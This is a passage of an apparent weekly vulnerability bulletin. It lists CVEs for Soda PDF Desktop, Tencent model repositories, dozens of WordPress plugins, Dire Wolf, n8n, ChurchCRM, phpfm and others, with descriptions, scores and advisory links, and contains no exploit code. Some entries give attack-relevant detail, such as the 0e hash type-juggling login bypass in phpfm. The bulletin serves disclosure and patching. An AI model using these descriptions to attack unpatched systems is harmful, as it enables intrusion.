| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27142. | 2025-12-23 | not yet calculated | CVE-2025-14410 | ZDI-25-1083 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27140. | 2025-12-23 | not yet calculated | CVE-2025-14411 | ZDI-25-1084 |
| Soda PDF--Desktop | Soda PDF Desktop XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27495. | 2025-12-23 | not yet calculated | CVE-2025-14412 | ZDI-25-1085 |
| Soda PDF--Desktop | Soda PDF Desktop CBZ File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CBZ files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27509. | 2025-12-23 | not yet calculated | CVE-2025-14413 | ZDI-25-1086 |
| Soda PDF--Desktop | Soda PDF Desktop Word File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Word files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27496. | 2025-12-23 | not yet calculated | CVE-2025-14414 | ZDI-25-1087 |
| Soda PDF--Desktop | Soda PDF Desktop Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27494. | 2025-12-23 | not yet calculated | CVE-2025-14415 | ZDI-25-1088 |
| Spider Themes--BBP Core | Missing Authorization vulnerability in Spider Themes BBP Core bbp-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BBP Core: from n/a through <= 1.4.1. | 2025-12-24 | not yet calculated | CVE-2025-68572 | https://vdp.patchstack.com/database/Wordpress/Plugin/bbp-core/vulnerability/wordpress-bbp-core-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve |
| Spiffy Plugins--Spiffy Calendar | Missing Authorization vulnerability in Spiffy Plugins Spiffy Calendar spiffy-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Spiffy Calendar: from n/a through <= 5.0.7. | 2025-12-24 | not yet calculated | CVE-2025-68523 | https://vdp.patchstack.com/database/Wordpress/Plugin/spiffy-calendar/vulnerability/wordpress-spiffy-calendar-plugin-5-0-7-broken-access-control-vulnerability?_s_id=cve |
| sunshinephotocart--Sunshine Photo Cart | Missing Authorization vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sunshine Photo Cart: from n/a through <= 3.5.7.1. | 2025-12-24 | not yet calculated | CVE-2025-68535 | https://vdp.patchstack.com/database/Wordpress/Plugin/sunshine-photo-cart/vulnerability/wordpress-sunshine-photo-cart-plugin-3-5-7-1-broken-access-control-vulnerability?_s_id=cve |
| Syed Balkhi--User Feedback | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Syed Balkhi User Feedback userfeedback-lite allows Blind SQL Injection. This issue affects User Feedback: from n/a through <= 1.10.1. | 2025-12-24 | not yet calculated | CVE-2025-68496 | https://vdp.patchstack.com/database/Wordpress/Plugin/userfeedback-lite/vulnerability/wordpress-user-feedback-plugin-1-10-1-sql-injection-vulnerability?_s_id=cve |
| Tencent--FaceDetection-DSFD | Tencent FaceDetection-DSFD resnet Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent FaceDetection-DSFD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the resnet endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27197. | 2025-12-23 | not yet calculated | CVE-2025-13715 | ZDI-25-1183 vendor-provided URL |
| Tencent--Hunyuan3D-1 | Tencent Hunyuan3D-1 load_pretrained Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent Hunyuan3D-1. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the load_pretrained function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27191. | 2025-12-23 | not yet calculated | CVE-2025-13713 | ZDI-25-1027 vendor-provided URL |
| Tencent--HunyuanDiT | Tencent HunyuanDiT model_resume Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the model_resume function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27183. | 2025-12-23 | not yet calculated | CVE-2025-13707 | ZDI-25-1029 vendor-provided URL |
| Tencent--HunyuanDiT | Tencent HunyuanDiT merge Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the merge endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27190. | 2025-12-23 | not yet calculated | CVE-2025-13712 | ZDI-25-1028 vendor-provided URL |
| Tencent--HunyuanVideo | Tencent HunyuanVideo load_vae Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanVideo. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the load_vae function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27186. | 2025-12-23 | not yet calculated | CVE-2025-13710 | ZDI-25-1030 vendor-provided URL |
| Tencent--MedicalNet | Tencent MedicalNet generate_model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent MedicalNet. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the generate_model function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27192. | 2025-12-23 | not yet calculated | CVE-2025-13714 | ZDI-25-1031 vendor-provided URL |
| Tencent--MimicMotion | Tencent MimicMotion create_pipeline Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent MimicMotion. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the create_pipeline function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27208. | 2025-12-23 | not yet calculated | CVE-2025-13716 | ZDI-25-1032 vendor-provided URL |
| Tencent--NeuralNLP-NeuralClassifier | Tencent NeuralNLP-NeuralClassifier _load_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent NeuralNLP-NeuralClassifier. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the _load_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27184. | 2025-12-23 | not yet calculated | CVE-2025-13708 | ZDI-25-1033 vendor-provided URL |
| Tencent--PatrickStar | Tencent PatrickStar merge_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent PatrickStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the merge_checkpoint endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27182. | 2025-12-23 | not yet calculated | CVE-2025-13706 | ZDI-25-1034 vendor-provided URL |
| Tencent--TFace | Tencent TFace restore_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the restore_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27185. | 2025-12-23 | not yet calculated | CVE-2025-13709 | ZDI-25-1036 vendor-provided URL |
| Tencent--TFace | Tencent TFace eval Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent TFace. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the eval endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27187. | 2025-12-23 | not yet calculated | CVE-2025-13711 | ZDI-25-1035 vendor-provided URL |
| The Plugin Factory--Google AdSense for Responsive Design | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Plugin Factory Google AdSense for Responsive Design – GARD google-adsense-for-responsive-design-gard allows DOM-Based XSS. This issue affects Google AdSense for Responsive Design – GARD: from n/a through <= 2.23. | 2025-12-24 | not yet calculated | CVE-2025-67632 | https://vdp.patchstack.com/database/Wordpress/Plugin/google-adsense-for-responsive-design-gard/vulnerability/wordpress-google-adsense-for-responsive-design-gard-plugin-2-23-cross-site-scripting-xss-vulnerability?_s_id=cve |
| thembay--Fana | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Fana fana allows PHP Local File Inclusion. This issue affects Fana: from n/a through <= 1.1.35. | 2025-12-24 | not yet calculated | CVE-2025-68540 | https://vdp.patchstack.com/database/Wordpress/Theme/fana/vulnerability/wordpress-fana-theme-1-1-35-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Zota | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Zota zota allows PHP Local File Inclusion. This issue affects Zota: from n/a through <= 1.3.14. | 2025-12-24 | not yet calculated | CVE-2025-68537 | https://vdp.patchstack.com/database/Wordpress/Theme/zota/vulnerability/wordpress-zota-theme-1-3-14-local-file-inclusion-vulnerability?_s_id=cve |
| Tikweb Management--Fast User Switching | Cross-Site Request Forgery (CSRF) vulnerability in Tikweb Management Fast User Switching fast-user-switching allows Cross Site Request Forgery. This issue affects Fast User Switching: from n/a through <= 1.4.10. | 2025-12-24 | not yet calculated | CVE-2025-68583 | https://vdp.patchstack.com/database/Wordpress/Plugin/fast-user-switching/vulnerability/wordpress-fast-user-switching-plugin-1-4-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| titopandub--Evergreen Post Tweeter | Cross-Site Request Forgery (CSRF) vulnerability in titopandub Evergreen Post Tweeter evergreen-post-tweeter allows Stored XSS. This issue affects Evergreen Post Tweeter: from n/a through <= 1.8.9. | 2025-12-24 | not yet calculated | CVE-2025-67622 | https://vdp.patchstack.com/database/Wordpress/Plugin/evergreen-post-tweeter/vulnerability/wordpress-evergreen-post-tweeter-plugin-1-8-9-cross-site-request-forgery-csrf-to-stored-xss-vulnerability?_s_id=cve |
| tmtraderunner--Trade Runner | Cross-Site Request Forgery (CSRF) vulnerability in tmtraderunner Trade Runner traderunner allows Cross Site Request Forgery. This issue affects Trade Runner: from n/a through <= 3.14. | 2025-12-24 | not yet calculated | CVE-2025-67625 | https://vdp.patchstack.com/database/Wordpress/Plugin/traderunner/vulnerability/wordpress-trade-runner-plugin-3-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| totalsoft--TS Poll | Missing Authorization vulnerability in totalsoft TS Poll poll-wp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TS Poll: from n/a through <= 2.5.3. | 2025-12-24 | not yet calculated | CVE-2025-68588 | https://vdp.patchstack.com/database/Wordpress/Plugin/poll-wp/vulnerability/wordpress-ts-poll-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| TouchOfTech--Draft Notify | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TouchOfTech Draft Notify draft-notify allows Stored XSS. This issue affects Draft Notify: from n/a through <= 1.5. | 2025-12-24 | not yet calculated | CVE-2025-67627 | https://vdp.patchstack.com/database/Wordpress/Plugin/draft-notify/vulnerability/wordpress-draft-notify-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TradingView--Desktop | TradingView Desktop Electron Uncontrolled Search Path Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of TradingView Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of the Electron framework. The product loads a script file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-27395. | 2025-12-23 | not yet calculated | CVE-2025-14498 | ZDI-25-1070 |
| Trustindex--Widgets for Social Photo Feed | Missing Authorization vulnerability in Trustindex Widgets for Social Photo Feed social-photo-feed-widget allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Widgets for Social Photo Feed: from n/a through <= 1.7.7. | 2025-12-24 | not yet calculated | CVE-2025-68595 | https://vdp.patchstack.com/database/Wordpress/Plugin/social-photo-feed-widget/vulnerability/wordpress-widgets-for-social-photo-feed-plugin-1-7-7-broken-access-control-vulnerability?_s_id=cve |
| Unknown--Gravity Forms | The Gravity Forms WordPress plugin before 2.9.23.1 does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path. | 2025-12-24 | not yet calculated | CVE-2025-13407 | https://wpscan.com/vulnerability/e09908fb-f5ad-45ca-8698-c0d596fd39cc/ |
| VIPRE--Advanced Security | VIPRE Advanced Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of VIPRE Advanced Security for PC. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the product installer. The issue results from incorrect permissions on a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27147. | 2025-12-23 | not yet calculated | CVE-2025-13703 | ZDI-25-1023 vendor-provided URL |
| Virusdie--Virusdie | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Virusdie Virusdie virusdie allows Retrieve Embedded Sensitive Data. This issue affects Virusdie: from n/a through <= 1.1.6. | 2025-12-24 | not yet calculated | CVE-2025-68576 | https://vdp.patchstack.com/database/Wordpress/Plugin/virusdie/vulnerability/wordpress-virusdie-plugin-1-1-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| Virusdie--Virusdie | Missing Authorization vulnerability in Virusdie Virusdie virusdie allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Virusdie: from n/a through <= 1.1.6. | 2025-12-24 | not yet calculated | CVE-2025-68577 | https://vdp.patchstack.com/database/Wordpress/Plugin/virusdie/vulnerability/wordpress-virusdie-plugin-1-1-6-broken-access-control-vulnerability?_s_id=cve |
| voidcoders--WPBakery Visual Composer WHMCS Elements | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in voidcoders WPBakery Visual Composer WHMCS Elements void-visual-whmcs-element allows DOM-Based XSS. This issue affects WPBakery Visual Composer WHMCS Elements: from n/a through <= 1.0.4.3. | 2025-12-24 | not yet calculated | CVE-2025-68574 | https://vdp.patchstack.com/database/Wordpress/Plugin/void-visual-whmcs-element/vulnerability/wordpress-wpbakery-visual-composer-whmcs-elements-plugin-1-0-4-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wappointment team--Wappointment | Missing Authorization vulnerability in Wappointment team Wappointment wappointment allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wappointment: from n/a through <= 2.7.2. | 2025-12-24 | not yet calculated | CVE-2025-68575 | https://vdp.patchstack.com/database/Wordpress/Plugin/wappointment/vulnerability/wordpress-wappointment-plugin-2-7-2-broken-access-control-vulnerability?_s_id=cve |
| wb2osz--Dire Wolf | wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 694c954, contain a stack-based buffer overflow vulnerability in the function kiss_rec_byte() located in src/kiss_frame.c. When processing crafted KISS frames that reach the maximum allowed frame length (MAX_KISS_LEN), the function appends a terminating FEND byte without reserving sufficient space in the stack buffer. This results in an out-of-bounds write followed by an out-of-bounds read during the subsequent call to kiss_unwrap(), leading to stack memory corruption or application crashes. This vulnerability may allow remote unauthenticated attackers to trigger a denial-of-service condition. | 2025-12-22 | not yet calculated | CVE-2025-34457 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-010-direwolf-stack-buffer-overflow-kiss-frame.md https://github.com/wb2osz/direwolf/issues/617 https://github.com/wb2osz/direwolf/commit/694c954 https://www.vulncheck.com/advisories/wb2osz-direwolf-stack-based-buffer-overflow-dos |
| wb2osz--Dire Wolf | wb2osz/direwolf (Dire Wolf) versions up to and including 1.8, prior to commit 3658a87, contain a reachable assertion vulnerability in the APRS MIC-E decoder function aprs_mic_e() located in src/decode_aprs.c. When processing a specially crafted AX.25 frame containing a MIC-E message with an empty or truncated comment field, the application triggers an unhandled assertion checking for a non-empty comment. This assertion failure causes immediate process termination, allowing a remote, unauthenticated attacker to cause a denial of service by sending malformed APRS traffic. | 2025-12-22 | not yet calculated | CVE-2025-34458 | https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-010-direwolf-stack-buffer-overflow-kiss-frame.md https://github.com/wb2osz/direwolf/issues/618 https://github.com/wb2osz/direwolf/commit/3658a87 https://www.vulncheck.com/advisories/wb2osz-direwolf-reachable-assertion-dos |
| webheadcoder--WH Tweaks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webheadcoder WH Tweaks wh-tweaks allows Stored XSS. This issue affects WH Tweaks: from n/a through <= 1.0.2. | 2025-12-24 | not yet calculated | CVE-2025-67630 | https://vdp.patchstack.com/database/Wordpress/Plugin/wh-tweaks/vulnerability/wordpress-wh-tweaks-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Shuffle--Subscribe to Unlock Lite | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WP Shuffle Subscribe to Unlock Lite subscribe-to-unlock-lite allows PHP Local File Inclusion. This issue affects Subscribe to Unlock Lite: from n/a through <= 1.3.0. | 2025-12-24 | not yet calculated | CVE-2025-68563 | https://vdp.patchstack.com/database/Wordpress/Plugin/subscribe-to-unlock-lite/vulnerability/wordpress-subscribe-to-unlock-lite-plugin-1-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| WP Socio--WP Telegram Widget and Join Link | Missing Authorization vulnerability in WP Socio WP Telegram Widget and Join Link wptelegram-widget allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Telegram Widget and Join Link: from n/a through <= 2.2.11. | 2025-12-24 | not yet calculated | CVE-2025-68589 | https://vdp.patchstack.com/database/Wordpress/Plugin/wptelegram-widget/vulnerability/wordpress-wp-telegram-widget-and-join-link-plugin-2-2-11-broken-access-control-vulnerability?_s_id=cve |
| WP Swings--Membership For WooCommerce | Authorization Bypass Through User-Controlled Key vulnerability in WP Swings Membership For WooCommerce membership-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Membership For WooCommerce: from n/a through <= 3.0.3. | 2025-12-24 | not yet calculated | CVE-2025-67909 | https://vdp.patchstack.com/database/Wordpress/Plugin/membership-for-woocommerce/vulnerability/wordpress-membership-for-woocommerce-plugin-3-0-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WPFactory--Free Shipping Bar: Amount Left for Free Shipping for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Free Shipping Bar: Amount Left for Free Shipping for WooCommerce amount-left-free-shipping-woocommerce allows Stored XSS. This issue affects Free Shipping Bar: Amount Left for Free Shipping for WooCommerce: from n/a through <= 2.4.9. | 2025-12-24 | not yet calculated | CVE-2025-68528 | https://vdp.patchstack.com/database/Wordpress/Plugin/amount-left-free-shipping-woocommerce/vulnerability/wordpress-free-shipping-bar-amount-left-for-free-shipping-for-woocommerce-plugin-2-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wphocus--My auctions allegro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Stored XSS. This issue affects My auctions allegro: from n/a through <= 3.6.32. | 2025-12-24 | not yet calculated | CVE-2025-68566 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wphocus--My auctions allegro | Cross-Site Request Forgery (CSRF) vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Cross Site Request Forgery. This issue affects My auctions allegro: from n/a through <= 3.6.32. | 2025-12-24 | not yet calculated | CVE-2025-68567 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-auctions-allegro-free-edition/vulnerability/wordpress-my-auctions-allegro-plugin-3-6-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| wpstream--WpStream | Missing Authorization vulnerability in wpstream WpStream wpstream allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpStream: from n/a through <= 4.9.5. | 2025-12-24 | not yet calculated | CVE-2025-68521 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpstream/vulnerability/wordpress-wpstream-plugin-4-9-5-broken-access-control-vulnerability?_s_id=cve |
| wpstream--WpStream | Missing Authorization vulnerability in wpstream WpStream wpstream allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpStream: from n/a through <= 4.9.5. | 2025-12-24 | not yet calculated | CVE-2025-68522 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpstream/vulnerability/wordpress-wpstream-plugin-4-9-5-broken-access-control-vulnerability-2?_s_id=cve |
| WPXPO--PostX | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPXPO PostX ultimate-post allows Retrieve Embedded Sensitive Data. This issue affects PostX: from n/a through <= 5.0.3. | 2025-12-24 | not yet calculated | CVE-2025-68606 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-post/vulnerability/wordpress-postx-plugin-5-0-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Yannick Lefebvre--Link Library | Server-Side Request Forgery (SSRF) vulnerability in Yannick Lefebvre Link Library link-library allows Server Side Request Forgery. This issue affects Link Library: from n/a through <= 7.8.4. | 2025-12-24 | not yet calculated | CVE-2025-68600 | https://vdp.patchstack.com/database/Wordpress/Plugin/link-library/vulnerability/wordpress-link-library-plugin-7-8-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| YITHEMES--YITH Slider for page builders | Missing Authorization vulnerability in YITHEMES YITH Slider for page builders yith-slider-for-page-builders allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects YITH Slider for page builders: from n/a through <= 1.0.11. | 2025-12-24 | not yet calculated | CVE-2025-68581 | https://vdp.patchstack.com/database/Wordpress/Plugin/yith-slider-for-page-builders/vulnerability/wordpress-yith-slider-for-page-builders-plugin-1-0-11-broken-access-control-vulnerability?_s_id=cve |
Vulnerability Summary for the Week of December 15, 2025
Posted on Monday December 22, 2025
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Cisco--Cisco Secure Email | Cisco is aware of a potential vulnerability. Cisco is currently investigating and will update these details as appropriate as more information becomes available. | 2025-12-17 | 10 | CVE-2025-20393 | cisco-sa-sma-attack-N9bf4 |
| Hewlett Packard Enterprise (HPE)--HPE OneView | A remote code execution issue exists in HPE OneView. | 2025-12-16 | 10 | CVE-2025-37164 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn4985en_us&docLocale=en_US |
| smallstep--Step-CA | An attacker can bypass authorization checks and force a Step CA ACME or SCEP provisioner to create certificates without completing certain protocol authorization checks. | 2025-12-17 | 10 | CVE-2025-44005 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2242 https://github.com/smallstep/certificates/security/advisories/GHSA-h8cp-697h-8c8p |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 5.21.0, a pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard allows unauthenticated attackers to inject arbitrary PHP code during the initial installation process, leading to complete server compromise. The vulnerability exists in `setup/routes/setup.php` where user input from the setup form is directly concatenated into a PHP configuration template without any validation or sanitization. Any parameter in the setup form can be used to inject PHP code that gets written to `Include/Config.php`, which is then executed on every page load. This is more severe than typical authenticated RCE vulnerabilities because it requires no credentials and affects the installation process that administrators must complete. Version 5.21.0 patches the issue. | 2025-12-17 | 10 | CVE-2025-62521 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-m8jq-j3p9-2xf3 |
| Microsoft--Azure Container Apps | Improper control of generation of code ('code injection') in Azure Container Apps allows an unauthorized attacker to execute code over a network. | 2025-12-18 | 10 | CVE-2025-65037 | Azure Container Apps Remote Code Execution Vulnerability |
| Microsoft--Microsoft Partner Center | Improper authorization in Microsoft Partner Center allows an unauthorized attacker to elevate privileges over a network. | 2025-12-18 | 10 | CVE-2025-65041 | Microsoft Partner Center Elevation of Privilege Vulnerability |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Versions prior to 6.5.3 may disclose database information in an error message including the host, ip, username, and password. Version 6.5.3 fixes the issue. | 2025-12-17 | 10 | CVE-2025-68110 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Versions starting with 0.211.0 and prior to 1.120.4, 1.121.1, and 1.122.0 contain a critical Remote Code Execution (RCE) vulnerability in their workflow expression evaluation system. Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime. An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations. This issue has been fixed in versions 1.120.4, 1.121.1, and 1.122.0. Users are strongly advised to upgrade to a patched version, which introduces additional safeguards to restrict expression evaluation. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Limit workflow creation and editing permissions to fully trusted users only; and/or deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation. These workarounds do not fully eliminate the risk and should only be used as short-term measures. | 2025-12-19 | 10 | CVE-2025-68613 | https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79 https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000 https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316 |
| Dulldusk--phpfm | phpfm 1.7.9 contains an authentication bypass vulnerability that allows attackers to log in by exploiting loose type comparison in password hash validation. Attackers can craft specific password hashes beginning with 0e or 00e to bypass authentication and upload malicious PHP files to the server. | 2025-12-16 | 9.8 | CVE-2023-53894 | ExploitDB-51594 phpFileManager Product Webpage VulnCheck Advisory: phpfm 1.7.9 Authentication Bypass via Type Juggling Vulnerability |
